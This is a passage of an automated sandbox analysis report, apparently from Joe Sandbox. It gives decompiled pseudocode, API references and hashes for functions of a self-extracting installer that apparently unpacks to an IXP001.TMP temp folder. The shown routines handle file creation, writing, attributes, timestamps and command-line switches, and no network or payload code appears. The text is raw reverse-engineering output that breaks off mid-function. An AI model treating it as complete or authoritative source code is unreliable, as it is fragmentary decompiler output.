						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00074B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00074cd0
0x00074cdb
0x00074ce0
0x00074ce2
0x00074cee
0x00074cf2
0x00074d0e
0x00074d0e
0x00074d11
0x00074e83
0x00074e88
0x00074e98
0x00074e98
0x00074d17
0x00074d17
0x00074d1a
0x00074d2f
0x00074d2f
0x00000000
0x00074d2f
0x00074d1c
0x00074d1c
0x00074d1f
0x00074dcb
0x00074dd0
0x00074dd2
0x00074ddd
0x00074ddd
0x00074de3
0x00074de8
0x00074ded
0x00074ded
0x00074def
0x00074df0
0x00074df0
0x00074df4
0x00074df4
0x00074df6
0x00074df9
0x00074dfc
0x00074dfc
0x00074dfe
0x00074dff
0x00074dff
0x00074e03
0x00074e08
0x00074e0a
0x00074e0f
0x00074d03
0x00074d03
0x00000000
0x00074d03
0x00074e18
0x00074e20
0x00074e25
0x00074e27
0x00000000
0x00000000
0x00074e33
0x00074e38
0x00074e3a
0x00000000
0x00000000
0x00074e40
0x00074e51
0x00074e56
0x00074e5b
0x00074e5e
0x00000000
0x00000000
0x00074e6a
0x00074e6f
0x00074e71
0x00000000
0x00000000
0x00074e77
0x00074e7d
0x00000000
0x00074e7d
0x00074d25
0x00074d25
0x00074d28
0x00074d36
0x00074d3b
0x00074d40
0x00074d40
0x00074d42
0x00074d43
0x00074d43
0x00074d47
0x00074d4a
0x00074d4a
0x00074d4c
0x00074d4f
0x00074d4f
0x00074d51
0x00074d52
0x00074d52
0x00074d56
0x00074d5b
0x00074d5d
0x00074d62
0x00000000
0x00000000
0x00074d67
0x00074d6f
0x00074d74
0x00074d76
0x00000000
0x00000000
0x00074d7c
0x00074d84
0x00074d89
0x00074d8b
0x00000000
0x00000000
0x00074d94
0x00074d99
0x00074d9e
0x00074da1
0x00074daa
0x00074daa
0x00074da3
0x00074da3
0x00074da3
0x00074db5
0x00074dbb
0x00074dbd
0x00000000
0x00074dc3
0x00074dc5
0x00000000
0x00074dc5
0x00074dbd
0x00074d2a
0x00074d2a
0x00074d2d
0x00000000
0x00000000
0x00000000
0x00074d2d
0x00074cf8
0x00074cfd
0x00074d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00074DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00074DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00074D36, 00074DE3

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-3699071305
Opcode ID: dc2ce7f834da00b92eb7adb68f79027b5d9570263dd2552381eebc4af44e6849
Instruction ID: 13abe2bcda49d0266f072e6847c7b0a5951d15c500748fbb34869fec3733f714
Opcode Fuzzy Hash: dc2ce7f834da00b92eb7adb68f79027b5d9570263dd2552381eebc4af44e6849
Instruction Fuzzy Hash: DB412336E041018BCB758F38D9446F973E5AB46300F04C668D8CE97292DB7DDE8AC758

Uniqueness

Uniqueness Score: -1.00%

Function 00074C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x78d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x78d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00074c40
0x00074c4a
0x00074c8d
0x00000000
0x00074c70
0x00074c70
0x00074c7e
0x00074c86
0x00000000
0x00000000
0x00000000
0x00074c8a

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00074C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00074C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00074C7E

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 885dedad5196f5871863566d5f5f773f2259f1d9318b64101f944e47100c62ac
Instruction ID: 719be1f21f509b55a95a4455108b29423f98862bc3032ef965891678c7863e91
Opcode Fuzzy Hash: 885dedad5196f5871863566d5f5f773f2259f1d9318b64101f944e47100c62ac
Instruction Fuzzy Hash: 67F06D72E01208AAABA59FA4CC499BB77ECEB45340B44852AA829D1050EB38D954C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0007487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0007487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0007490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00074880
0x0007488c
0x00074894
0x000748a0
0x000748c9
0x000748ce
0x000748a2
0x000748a8
0x000748b7
0x000748bc
0x000748aa
0x000748ac
0x000748ac
0x000748a8
0x000748de
0x000748e7
0x0007490b
0x000748ee
0x000748f0
0x00000000
0x00074902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00074A23,?,00074F67,*MEMCAB,00008000,00000180), ref: 000748DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00074F67,*MEMCAB,00008000,00000180), ref: 00074902

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45bacc9bd5eecedb0927a9edee0bb29f17614840971afc0d204e24db11f23fa6
Instruction ID: ddaac0f8f51d2b01c0bbccf170711333cea4e898b724f362972c58c6593602eb
Opcode Fuzzy Hash: 45bacc9bd5eecedb0927a9edee0bb29f17614840971afc0d204e24db11f23fa6
Instruction Fuzzy Hash: 63018BA3F1153426F36440284C88FBB444CCBDA731F1B8331BEAEE71D2D6684C0081E4

Uniqueness

Uniqueness Score: -1.00%

Function 00074AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00074AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x7858c; // 0x268
				_t9 = E00073680(_t20);
				if( *0x791d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x78d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x79400; // 0xb7e00
							_t15 = _t14 + _t25;
							 *0x79400 = _t15;
							if( *0x78184 != 0) {
								_t21 =  *0x78584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x793f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00074ad5
0x00074adb
0x00074ae7
0x00074aee
0x00074b05
0x00074b0d
0x00074b14
0x00074b1a
0x00074b1c
0x00074b21
0x00074b2a
0x00074b2f
0x00074b31
0x00074b39
0x00074b54
0x00074b54
0x00074b39
0x00074b2f
0x00074b0f
0x00074b0f
0x00074b0f
0x00074b5e
0x00074ae9
0x00074aed
0x00074aed

APIs

Part of subcall function 00073680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0007369F
Part of subcall function 00073680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736B2
Part of subcall function 00073680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00074B05

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: c2f4a138e10e3f173a9d238f4ec1b2fe309fe4df5d83b719c3257faf3aaf5edb
Instruction ID: 7aa4d531bd6c8bf2c7b16f08f5b66c9a96877e4f882e6627d2708eaf761d2000
Opcode Fuzzy Hash: c2f4a138e10e3f173a9d238f4ec1b2fe309fe4df5d83b719c3257faf3aaf5edb
Instruction Fuzzy Hash: 10018031E40205ABE7148F58DC09BA677A9E744725F04C225F93DA71E0CB7CDCA1CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0007658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x78b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x78b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E000716B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00076592
0x00076594
0x00076596
0x00076598
0x00076598
0x0007659b
0x0007659b
0x0007659d
0x0007659e
0x000765a2
0x000765a4
0x000765a9
0x000765b2
0x000765b6
0x000765ba
0x000765c3
0x000765c5
0x000765c8
0x000765c8
0x000765c3
0x000765c9
0x000765cc
0x000765d2
0x000765d1
0x000765d1
0x00000000
0x000765dc
0x00000000

APIs

CharPrevA.USER32(00078B3E,00078B3F,00000001,00078B3E,-00000003,?,000760EC,00071140,?), ref: 000765BA

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 26daea465df6d50caa76d541822274b6ee98d565319d9b6776a99ae323d4dce4
Instruction ID: 6bdc2aaece9f382640334d2971c77a7c61fbafa70906dde86a1a09718fd7ec9b
Opcode Fuzzy Hash: 26daea465df6d50caa76d541822274b6ee98d565319d9b6776a99ae323d4dce4
Instruction Fuzzy Hash: 4CF02D72A04E509BD332051D9884BAABFD99B86350F24816AE8DFC3245DA5F5C4592B8

Uniqueness

Uniqueness Score: -1.00%

Function 0007621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0007621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x78004; // 0xa87cf02e
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0007597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E000744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x79124 = E00076285();
					_t9 = 0;
				}
				return E00076CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00076229
0x00076230
0x00076247
0x0007626a
0x00076272
0x00076249
0x00076255
0x0007625f
0x00076264
0x00076264
0x00076284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0007623F

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: b5a97050fb993ac90dc9a1a7238143af2dc1a30cc3d26f7891db1bfffc320aac
Instruction ID: 4472abb9a8662cebf8e12b80ab557bffb4b28b9668f2399118bf137d5b31954e
Opcode Fuzzy Hash: b5a97050fb993ac90dc9a1a7238143af2dc1a30cc3d26f7891db1bfffc320aac
Instruction Fuzzy Hash: 7FF0B4B0F00608ABE790EB748D06BFE32A8DB44300F408469A98EE6083DD7D99858698

Uniqueness

Uniqueness Score: -1.00%

Function 00074B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x78d64)) != 1) {
					_t7 = _t15 + 0x78d74; // 0x96ccbf22, executed
					_t9 = FindCloseChangeNotification( *_t7); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x78d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x78d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x78d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x78d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x78d6c)) = 0;
				return 0;
			}

0x00074b66
0x00074b74
0x00074b92
0x00074b98
0x00074ba0
0x00000000
0x00074bac
0x00074ba4
0x00000000
0x00074ba4
0x00074b78
0x00074b7e
0x00074b84
0x00074b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(96CCBF22,00000000,00000000,?,00074FA1,00000000), ref: 00074B98

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a7124282b3d058f5804ff903f167ea6e84ff142cc4505303736bc381a5833b2f
Instruction ID: 5d969e74c608849cc10292d500589ad84973970382a28eba136aad473f0694d0
Opcode Fuzzy Hash: a7124282b3d058f5804ff903f167ea6e84ff142cc4505303736bc381a5833b2f
Instruction Fuzzy Hash: F3F01231F80B089E47718F39CC0A696BBE4ABD53A1710C92F946ED2190EB38AC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 000766AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000766AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x000766b1
0x000766ba
0x000766c7
0x000766bc
0x000766be
0x000766be

APIs

GetFileAttributesA.KERNELBASE(?,00074777,?,00074E38,?), ref: 000766B1

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3eb9a60065c57631e36603cfc6677c42497082345db8f99bbcf5fcadc092178d
Instruction ID: 8b3f8ea3b8d7c05fe251044c3297568f2dda8d923b843bd0556bdbe10cbd74db
Opcode Fuzzy Hash: 3eb9a60065c57631e36603cfc6677c42497082345db8f99bbcf5fcadc092178d
Instruction Fuzzy Hash: 81B092B6A22840426E6006316C2955A2881B7C233A7E85B90F03BD01E0CA3ED886D048

Uniqueness

Uniqueness Score: -1.00%

Function 00074CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00074caa
0x00074cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00074CAA

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 522770a83f18779201b5eb02782907131ea1052f95177ad6373b2d62540a61f1
Instruction ID: 4128babbcfca99aaef9b807e94c0681fa86be86e787eab50323ceb663543495c
Opcode Fuzzy Hash: 522770a83f18779201b5eb02782907131ea1052f95177ad6373b2d62540a61f1
Instruction Fuzzy Hash: 1BB0123214420CB7DF001FC2EC09F893F5DF7C5761F140000F60C450508A7A945086D6

Uniqueness

Uniqueness Score: -1.00%

Function 00074CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00074cc8
0x00074ccf

APIs

GlobalFree.KERNELBASE ref: 00074CC8

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: d089ac26431a1fa6815cfd3e7abb4dc49caec2c0fdca8011840e240b87da1fd4
Instruction ID: 7b59718697eb7b19d9615c41feeca36b5334107249be29aa0e08cbf812a41ba9
Opcode Fuzzy Hash: d089ac26431a1fa6815cfd3e7abb4dc49caec2c0fdca8011840e240b87da1fd4
Instruction Fuzzy Hash: 38B0123100010CBB8F001B42EC088493F1DD7C13607000010F50C410218B3F985185C5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00075C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00075C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x78004; // 0xa87cf02e
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00076CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00076E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x78004; // 0xa87cf02e
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0007597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E000744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x79124 = E00076285();
									_t75 = 0;
								}
								return E00076CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E000744B9(0, 0x521, 0x71140, 0, 0x40, 0);
												_t85 =  *0x78588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0007667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0007667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00075C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00071680(0x78c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0007667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
